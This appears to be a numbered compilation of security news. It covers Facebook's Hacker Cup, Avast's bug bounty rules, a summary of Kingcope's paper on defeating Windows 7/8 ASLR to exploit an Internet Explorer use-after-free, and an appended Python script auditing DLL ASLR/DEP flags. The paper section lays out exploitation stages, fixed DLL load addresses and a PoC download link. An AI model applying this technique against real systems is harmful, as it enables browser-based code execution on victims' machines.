The Hacker Cup is important for a couple of reasons. For one, it shows that, although Facebook is pushing past one billion members of its social network and is now one of the world's biggest public tech companies, it is committed to trying to stay close to its Hacker Way roots. This is important for it to stay innovative, but it also helps keep Facebook in touch with the world community of top, smart programmers — an obvious route to tapping for top engineering talent.

Facebook says that those who registered for a previous year are automatically registered for the competition year, although they still need to check their information is up-to-date. There is no limit to the number of people registering for the competition, as long as you sign up by the end of the first round, on the 27th of January. But there are a few limits on who can participate. Facebook notes in its rules and regulations that you need to be registered on Facebook yourself, you need to be 18 or older, and you cannot be resident in Quebec (!) or any other place where these kinds of competitions are prohibited by law. You also need to provide your real name, postal address, phone number, email address, and date of birth, which may weed out a few Anonymous types, as brilliant as some of them may be.

The competition will follow the same form as in past years. Rather than free-form hackathon-style hacking, contestants are given problem sets that they need to solve. Answers come by way of source code and an output file to show how it works. They will be judged on how well they can come up with the solution in a set period of time, via a timer in the input set. They have six minutes to submit the source code and output file — and they can submit multiple answers in that time.

Last year, the Hacker Cup attracted 8,000 hopefuls from 150 countries, but the final 25 came from a relatively narrow list of countries – Russia, Germany, Poland, Ukraine, China, South Korea, Japan, Taiwan, and the U.S., with the winner, Roman Andreev, hailing from Russia. You can read more about him and last year's competition here. Just as it is telling that Facebook runs a Hacker Cup, it will be telling to see how many enter this year and how the country spread for finalists compares.

Register FAQ Source
  23. Hello Avast fans! It is my pleasure to officially announce the new Avast bug bounty program.

As a security company, we very much realize that security bugs in software are reality. But we also realize that companies that are able to use their user communities to find and fix bugs are generally more successful than those that don't. Therefore, we have decided to reward individuals who help us find and fix security-related bugs in our own software. This makes us probably the first security vendor with a reward program like this: I think it's mainly because the other companies generally take the position that 'Hey, we're a security company. So we know security and it can't happen to us.' But in reality, that's not what's happening. Just look at bugtraq or the CVE databases and you will find that security software is no more immune to these issues than any other programs. A bit of irony, given that people generally install security software to fight security issues in the first place, isn't it?

We at Avast take this very seriously. We know that being a market leader (Avast has more users than any other AV company in the world), we're a very attractive target for the attackers. So, here's our call to action: let's unite and find and fix those bugs before the bad guys do!

Here's how it works:

The bounty program is designed for security-related bugs only. Sorry, we're not paying for other types of issues like bugs in the UI, localization etc. (nevertheless, if you find such a bug, we will of course very much appreciate if you report it). This program is currently intended only for our product, i.e. not the website etc. We're generally only interested in these types of bugs (in the order of importance):

  - Remote code execution. These are the most critical bugs.
  - Local privilege escalation. That is, using Avast to e.g. gain admin rights from a non-admin account.
  - Denial-of-service (DoS). In case of Avast, that would typically be BSODs or crashes of the AvastSvc.exe process.
  - Escapes from the avast! Sandbox (via bugs in our code).
  - Certain scanner bypasses. These include straightforward, clear bypasses (i.e. scenarios that lead to direct infection, with no additional user input), as opposed to things like deficiencies in the unpacking engine etc. In other words, we're interested only in cases that cannot be mitigated by adding a new virus definition (please don't report undetected malware).
  - Other bugs with serious security implications (will be considered on a case by case basis).

The base payment is $200 per bug. Depending on the criticality of the bug (as well as its neatness) the bounty will go much higher (each bug will be judged independently by a panel of experts). Remote code execution bugs will pay at least $3,000 – $5,000 or more. We might change these ranges based on the number and quality of incoming reports. Generally, the fewer reports we get, the higher the bounty will go.

We will only pay for bugs in Avast itself. For example, if you find a bug in a Microsoft library (even if it's used by Avast), please report it to Microsoft instead (it would be great if you could also notify us, but unfortunately, we cannot offer any reward in such cases). The program is currently limited to consumer Windows versions of Avast (i.e.: Avast Free Antivirus, Avast Pro Antivirus, and Avast Internet Security). Only bugs in the latest shipping versions of these products will be considered.

Payment will be done preferably by PayPal. If you can't accept PayPal (e.g. because it doesn't work in your country), please get in touch with us and we will try to figure out something else. Because of certain legal restrictions, we cannot accept submissions from the following countries: Iran, Syria, Cuba, North Korea and Sudan. It is the researcher's own responsibility to pay any taxes and other applicable fees in their country of residence.

In order to be eligible for the bounty, the bug must be original and previously unreported. If two or more researchers happen to find the same bug, the bounty will be paid only to the one whose submission came in first. You must not publicly disclose the bug until after an updated version of Avast that fixes the bug is released. Otherwise, the bounty will not be paid. The bounty will be paid only after we fix the issue (or, in specific cases, decide to not fix it). Some bugs may take longer to correct. We will do our best to fix any critical bugs in a timely fashion. We appreciate your patience. Employees of AVAST and their close relatives (parents, siblings, children, or spouse) and AVAST business partners, agencies, distributors, and their employees are excluded from this program. We reserve the right to change the rules of the program or to cancel it at any time.

How to report a bug and qualify for the bounty:

  - Please submit the bug to a special email address bugs@avast.com. If you'd like to encrypt your email (recommended), please use this PGP key.
  - A good bug report needs to contain sufficient information to reliably reproduce the bug on our side. Please include all information that may be relevant – your exact environment, detailed bug description, sample code (if applicable) etc. It also needs to contain a decent analysis – this is a program designed for security researchers and software developers and we expect a certain quality level.
  - You will receive a response from an Avast team member acknowledging receipt of your email, typically within 24 hrs. If you do not receive a response, please do not assume we're ignoring you – we will do our best to follow up with you asap. Also, in such a case it is possible your email didn't make it through a spam filter.

Finally, I'd like to say thanks to everyone who helps to find and fix bugs in our products. Hopefully, this new reward program will take this initiative to a whole new level. Happy [bug]hunting!

P.S. The bug bounty rules are also available on our main website here.

Via: avast! blog Introducing the New Avast Bug Bounty Program
  24. ==================================================
Attacking the Windows 7/8 Address Space Randomization
Copyright © 2013 Kingcope
"Was nicht passt wird passend gemacht" (English: "If it don't fit, use a bigger hammer.") German phrase
==================================================

Synopsis - What this text is all about
==================================================

The following text is what looks like an attempt to circumvent Windows 7 and Windows 8 memory protections in order to execute arbitrary assembly code. The presented methods are in particular useful for client-side attacks as used for example in browser exploits. The topic that is discussed is a very complex one. At the time I started the research I thought the idea behind the attack would be applied to real-world scenarios quick and easy. I had to be convinced of the opposite. The research was done without knowing much about the real internals of the Windows memory space protection but rather using brute force, trial & failure in order to achieve what will be presented in the upcoming text. Be warned - the methods to attack the protection mechanisms hereby presented are not failsafe and can be improved. Though in many cases it is possible to completely bypass Windows 7 and especially Windows 8 ASLR by using the techniques.

Target Software
==================================================

The used operating systems are Windows 7 and Windows 8, the included PoC code runs on 32 Bit platforms and exploits Internet Explorer 8. All can be applied to Internet Explorer 9 with modifications to the PoC code. For Internet Explorer 10 the memory protection bypass is included and demonstrated in the PoC. Executing code through return oriented programming is left as an exercise to the reader. The PoC makes use of the following vulnerability and therefore for testing the PoC the patch must not be installed.

MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability

This vulnerability is identified as CVE-2012-4969. It might be possible to use the very same method to exploit other browsers as other browsers give similar opportunities to the exploit writer. I don't want to sound crazy but even other Operating Systems might be affected by this, yet unconfirmed.

Current ways to exploit browsers
==================================================

Today a lot of attention is brought to client side exploits especially inside web browsers. Normally the exploitation is done through the old known method of spraying the heap. This is done by populating the heap with nopsleds and actual shellcode. By filling the heap in this way a heap overrun can be used to rewrite the instruction pointer of the processor to a known heap address where the shellcode resides quite deterministically. In order to bypass protections like Data Execution Prevention a ROP chain is built. There are exploits that install a stack pivot in the first place in order to exploit a heap overrun as if it were a stack based buffer overrun using a "return into code" technique. The mentioned modern ways to exploit heap corruptions are documented very well.

When it comes to Windows 7 and Windows 8 exploitation the exploit writer will face the obstacle of randomized memory space. There remains the simple question: where do I jump to when having control over the instruction pointer? It might be possible to leak memory directly from the web browser and use this information to gain information about the correct offsets and executable code sections. This requires knowledge about a memory leak bug though and therefore is not used a lot. Another option is to use old DLLs that do not have their image bases randomized, for example older Java versions are known to have un-randomized image bases. This option requires the use of third-party software that has to be installed. This text will present a new way to deal with the 'where do I jump when I have code execution' problem.

Introduction to Windows memory randomization
==================================================

Windows 7 and Windows 8 have a special security relevant protection programmed in. The so called A.S.L.R or '[A]ddress [S]pace [L]ayout [R]andomization' that does nothing more than randomize every piece of memory, say its offsets. For example the program image is randomized, the DLLs the program uses are randomized too. There is not a single piece of memory from which one could say after a reboot the data in the memory space will be at the same place as before the reboot. The addresses even change when a program is restarted.

ActiveX and other useful features
==================================================

Web browser exploits have many advantages over other kinds of exploits. For example JavaScript code can be executed inside the web browser. This is also the tool that heap spraying makes use of. Let us have a look at what happens if we load an ActiveX object dynamically when a web page loads. The ActiveX object we will load is the Windows Media Player control. This can either be done using JavaScript or plain HTML code. At the point the ActiveX object is loaded Windows will internally load the DLLs into memory space if they previously were not inside the program's memory space. The offset of loading the DLLs in memory space is completely random. At least it should be. Let us now see how we can manage to put a DLL into memory space at a fixed address by loading an ActiveX object at runtime.

Exhausting memory space and squeezing DLLs into memory
==================================================

The nuts and bolts of what is presented here is the idea that DLLs are loaded into memory space if there is memory available, and if there is no memory or only small amounts of memory available then the DLL will be put into the remaining memory hole. This sounds simple. And it works, we can load a DLL into a remaining memory hole. First of all the exploit writer has to code a JavaScript routine that does fill memory until the memory boundary is hit and a JavaScript exception is raised. When the memory is filled up the installed JavaScript exception handler will execute JavaScript code that frees small chunks of memory in several steps, each step the JavaScript code will try to load an ActiveX object. The result is that the DLL (sometimes there are several DLLs loaded for an ActiveX object) will be loaded at a predictable address. This means that now the exploit writer has a predictable address to jump to and the 'where do I jump when I have code execution' problem is solved. One problem the method has is that Windows will become unresponsive at the time memory is exhausted but will resume normal operation after the DLL is loaded at a fixed address and the memory is freed using the JavaScript code.

Summary of exploitation stages:

* Fill the heap with random bytes until all memory is used up. During the heap filling stage Windows might become unresponsive and will relax soon afterwards
* Free small heap blocks one by one and try adding a DLL (for example by using a new ActiveX Object that is loadable without a warning by Internet Explorer). This DLL (and the DLLs that are loaded from it) will be squeezed into the remaining memory region (the space that was freed by us through JavaScript). This address is fixed and predictable for us to jump to
* Free the remaining memory blocks which were allocated before
* Spray the heap using the well known method
* Finally trigger the heap corruption and jump to this fixed DLL base to execute our code in a ROP manner.

To put it abstractly, the exploit writer has to be especially careful about the timing in the JavaScript code and about the memory the exploit routines themselves take up.

ROP chain and the LoadLibrary API
==================================================

At the time we have loaded the DLL at a predictable address it is possible to use a ROP chain in order to execute shellcode. The PoC code goes a much simpler path. It will use a short ROP chain and call the LoadLibrary API that is contained in the Windows Media Player DLLs. This way another DLL can be fetched from a WebDAV share and loaded into the Internet Explorer memory space in order to fully execute arbitrary code.

Windows 8 singularity
==================================================

Testcases have shown that Windows 8 is more vulnerable to the method than Windows 7. In Windows 8 the DLL will be loaded at the very low address 0x10000 and more reliably than in Windows 7. Windows 7 is much more persistent in loading the DLL at a fixed memory address. The testcases for Windows 7 have shown that the DLL will be loaded at the predictable address at least 7 out of 10 times of loading the exploit.

The PoC codes
==================================================

There are two different PoCs, one for Windows 7 and one for Windows 8. The Windows 8 code is a slightly modified version of the Windows 7 code. Please note that Windows Defender detects the Win8 PoC as being an exploit and blocks execution. The parts which are detectable by Windows Defender are not needed for the A.S.L.R. attack to work. Please disable Windows Defender if you test the Windows 8 PoC for now. The Windows 7 PoC is successful if it loads gdiplus.dll at the predictable fixed offset 0x7F7F0000. If you are lucky and have set up the exploit appropriately the payload will be executed, which is currently a MessageBox that pops up. The Windows 8 PoC is successful if it loads gdiplus.dll at the predictable fixed offset 0x10000. Please note that wmp.dll (Windows Media Player DLL) and gdiplus.dll should not be in the Internet Explorer address space prior to executing the PoC for it to succeed. As a final note, the PoC does not depend on the ActiveX control that is added; it can be changed with some effort to load a different DLL.

Here are the mappings I tested when the PoC succeeds:

Windows 7 32-Bit Service Pack 0 & Service Pack 1 across reboots:

Address   Size      Owner    Section  Contains       Type  Access
7F7F0000  00001000  gdiplus           PE header      Imag  R RWE
7F7F1000  0016B000  gdiplus  .text    code,imports   Imag  R RWE
7F95C000  00008000  gdiplus  .data    data           Imag  R RWE
7F964000  00001000  gdiplus  Shared                  Imag  R RWE
7F965000  00012000  gdiplus  .rsrc    resources      Imag  R RWE
7F977000  00009000  gdiplus  .reloc   relocations    Imag  R RWE

Windows 8 32-Bit across reboots:

Address   Size      Owner    Section  Contains       Type  Access
00010000  00001000  gdiplus           PE header      Imag  R RWE
00011000  00142000  gdiplus  .text    code,exports   Imag  R RWE
00153000  00002000  gdiplus  .data                   Imag  R RWE
00155000  00003000  gdiplus  .idata   imports        Imag  R RWE
00158000  00012000  gdiplus  .rsrc    resources      Imag  R RWE
0016A000  00009000  gdiplus  .reloc   relocations    Imag  R RWE

Enjoy!

This archive has a whitepaper that discusses research and methods used to circumvent Microsoft Windows 7 and 8 memory protections in order to execute arbitrary assembly code. Proof of concepts are also provided.

Download http://packetstormsecurity.com/files/119835/Attacking-The-Windows-7-8-Address-Space-Randomization.html
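The paper's remark that un-randomized DLLs (older Java versions, for instance) hand an attacker a fixed jump target is something a defender can audit: the Windows loader only relocates an image that opts in with IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE and still carries its relocation data, and DEP likewise depends on NX_COMPAT. The Python below is an added example, not part of Kingcope's paper or PoCs; it reads those flags straight from a PE header, and the sample headers it checks are constructed in `build_header` rather than taken from real DLLs.

```python
"""Audit a PE image's ASLR/DEP opt-in flags from its headers (added example)."""
import struct
import sys

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits
IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA = 0x0020
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100
# IMAGE_FILE_HEADER.Characteristics bit
IMAGE_FILE_RELOCS_STRIPPED = 0x0001


def pe_mitigations(data: bytes) -> dict:
    """Return the ASLR/DEP related flags of a PE32 or PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_chars = struct.unpack_from("<HHIIIHH", data, coff)[6]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    dynamic_base = bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
    relocs_stripped = bool(file_chars & IMAGE_FILE_RELOCS_STRIPPED)
    return {
        "pe32plus": magic == 0x20B,
        "dynamic_base": dynamic_base,
        "relocs_stripped": relocs_stripped,
        # the loader can only rebase an image that still has its relocations
        "aslr_effective": dynamic_base and not relocs_stripped,
        "nx_compat": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "high_entropy_va": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA),
    }


def missing_mitigations(data: bytes) -> list:
    """List the findings a hardening audit would flag for this image."""
    m = pe_mitigations(data)
    findings = []
    if not m["dynamic_base"]:
        findings.append("DYNAMIC_BASE not set: image loads at its preferred base")
    elif m["relocs_stripped"]:
        findings.append("relocations stripped: DYNAMIC_BASE cannot be honoured")
    if not m["nx_compat"]:
        findings.append("NX_COMPAT not set: DEP may not apply to this process")
    return findings


def build_header(dll_chars: int, file_chars: int = 0x2102) -> bytes:
    """Constructed (not real) PE32 DLL header carrying the given flag words."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> right after the DOS stub
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, file_chars)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)     # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # Audit a DLL given on the command line, or the constructed samples otherwise.
    if len(sys.argv) > 1:
        samples = {sys.argv[1]: open(sys.argv[1], "rb").read()}
    else:
        samples = {"hardened": build_header(0x0140), "legacy": build_header(0x0000),
                   "relocs stripped": build_header(0x0040, 0x2103)}
    for name, blob in samples.items():
        print(name, "->", missing_mitigations(blob) or ["ok"])
```

Run against a real module (`python audit.py C:\path\to\some.dll`) the same functions report whether that module would be rebased by ASLR; a module with an empty findings list still has to be loaded into a process that honours the flags.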